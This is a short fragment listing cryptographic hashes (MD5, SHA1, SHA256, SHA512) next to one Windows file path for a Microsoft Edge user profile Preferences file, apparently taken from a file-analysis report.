SHA1 9e62192c49316c0c2ce50aad0c4acd81c82b976b
SHA256 86c9502365aed6d55f7ca248f0e9467ec48e3a39f92d9e3a7269f226887c08c1
SHA512 17075987f3dc37b4ef672ad8ab77639e17f439589797da38a7c0fded0aeca47d3f6a5916abd642363cb623dd725ad70b95720866c6c6fff4df58dec9c9644e22

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1fff045669ea8d7bcff5d88651e935f4
SHA1 e72a416e2ba5dda787401df585380c82700ab25f
SHA256 56983270174507e523767399add4f8965ef5ae744065ff03f3ab547afbc818c4
SHA512 4c07f0ce5c223c22bcb784b9df4eea7dca28c7edb0cd1ac91458b59750f86a8223c28b392de54c306d364834e01ec06f1ffc9d4fc6e88ff6536889c8e34156a2